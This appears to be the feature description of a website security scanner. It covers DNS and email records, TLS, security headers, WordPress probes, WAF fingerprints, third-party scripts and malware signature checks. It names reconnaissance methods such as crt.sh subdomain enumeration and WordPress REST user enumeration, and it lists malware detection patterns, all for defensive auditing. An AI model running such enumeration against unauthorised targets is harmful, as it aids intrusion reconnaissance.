We retrieve A, AAAA, MX, NS, CAA, and TXT records, then analyse SPF, DMARC, MTA-STS, TLS-RPT, and service fingerprints. Domain WHOIS data and Certificate Transparency logs are also included.

• ◐mediumNo SPF record — any server can send email as your domain; add v=spf1 ... -all
• ·lowNo DMARC record — makes phishing with your domain harder to detect and block
• ◐mediumMultiple SPF records — RFC 7208 allows only one; duplicates cause delivery failures
• ·lowNo CAA records — any certificate authority can issue certs for your domain
• ·lowNo MTA-STS record — inbound mail can be downgraded to plaintext (only flagged if MX records exist)
• ·lowNo TLS-RPT record — no visibility into SMTP TLS delivery failures
• ·lowCertificate Transparency — enumerates every subdomain ever issued a public TLS certificate via crt.sh; surfaces forgotten staging/admin hosts
• ✓okService detection — identifies email providers, CDNs, and SaaS tools from DNS records
• ✓okWHOIS — registrar, creation date, expiry date, and domain status flags
• ✓okDNS lookup buttons — find other websites on the same IP, MX, or NS via dnsarchive.net

SSL/TLS encrypts traffic between the browser and server. We validate the certificate chain, expiry, and protocol version, then trace the HTTP→HTTPS redirect chain and check the HSTS preload list.

• ✖criticalExpired certificate — browsers block the site and show security warnings to all visitors
• ▲highExpiring within 14 days — renew immediately to avoid outage and visitor trust loss
• ·lowTLS 1.2 — still secure but TLS 1.3 offers better performance and forward secrecy
• ▲highTLS 1.0 / 1.1 — deprecated; vulnerable to BEAST and POODLE attacks
• ▲highHTTP not redirecting to HTTPS — site accessible over plain HTTP; man-in-the-middle exposure
• ·lowLong redirect chain — more than 3 hops slows the first visit; collapse to one redirect
• ·lowNot on HSTS preload list — first-visit downgrade attacks remain possible (queried via hstspreload.org)

We fingerprint the CMS by inspecting HTML source, HTTP headers, and URL patterns. When WordPress is detected we run additional security probes.

• ✓okPlugin detection — enumerated from HTML source references to /wp-content/plugins/
• ◐mediumXML-RPC exposed — allows brute-force amplification attacks; disable if not needed
• ·lowDefault login path — /wp-login.php is publicly accessible; consider obfuscating or rate-limiting
• ◐mediumUser enumeration — checks the WordPress REST API /wp-json/wp/v2/users endpoint and lists every exposed account (id, display name, slug)

Content-Security-Policy     critical
X-Content-Type-Options      high
X-Frame-Options             high
Strict-Transport-Security   medium
Referrer-Policy             medium
Permissions-Policy          medium
Cross-Origin-Opener-Policy  low

• ✖criticalCSP — missing allows XSS injection and data exfiltration
• ▲highX-Content-Type-Options — missing enables MIME-sniffing attacks
• ▲highX-Frame-Options — missing allows clickjacking via iframe embedding
• ◐mediumHSTS — missing allows browsers to connect over plain HTTP
• ◐mediumCSP quality — flags 'unsafe-inline', 'unsafe-eval', wildcards, and missing frame-ancestors / object-src / base-uri
• ▲highMixed content — http:// resources loaded on an HTTPS page; browsers block them and TLS guarantees are broken
• ·lowsecurity.txt — checks /.well-known/security.txt (RFC 9116) so researchers can find a vulnerability contact

Cloudflare                  cf-ray, cf-cache-status, server: cloudflare
AWS CloudFront              server: CloudFront, x-amz-cf-id, x-amzn-waf-action
Sucuri                      x-sucuri-id, x-sucuri-cache, server: sucuri
Akamai                      server contains "Akamai"

• ✓okHosting provider — Kinsta, WP Engine, Hostinger detected via response headers
• ✓okHTTP version — HTTP/3 and HTTP/2 flagged as positive; HTTP/1.1 flagged as a warning
• ✓okCompression — Brotli and GZIP detection from Content-Encoding header
• ▲mediumServer version exposed — e.g. Apache/2.4.51; reveals fingerprinting info to attackers
• ✖criticalPHP version exposed — X-Powered-By leaks PHP version; strip with expose_php = Off
• ◐mediumCookie security audit — checks every Set-Cookie for Secure, HttpOnly, and SameSite flags; flags any cookie missing one

We parse all <script src> tags and identify scripts loaded from external domains. Third-party JS has full access to page content and user input — a compromised CDN or ad network can silently exfiltrate credentials.

• ◐mediumMore than 10 external scripts — high third-party exposure; each domain is an additional attack surface
• ▲highMore than 20 external scripts — critical third-party exposure; auditing is strongly recommended
• ✓okScript breakdown — grouped by domain with direct links to each file for inspection
• ✓okStatic vs dynamic — differentiates hardcoded script tags from dynamically injected ones
• ◐mediumSubresource Integrity (SRI) — flags external scripts without an integrity= hash; without SRI, a CDN compromise silently injects malicious code into your site

We scan the page HTML for known malware signatures and check the domain against major security blocklists.

• ✖criticalGoogle Safe Browsing — used by Chrome and Firefox to block dangerous sites globally
• ✖criticalVirusTotal — aggregates 70+ antivirus engines and URL scanners
• ▲highMalware patterns — obfuscated scripts, base64-encoded payloads, eval() injection
• ▲highBad domain references — links to known malicious domains in page source
• ▲highSEO spam patterns — hidden links and cloaked content injected by attackers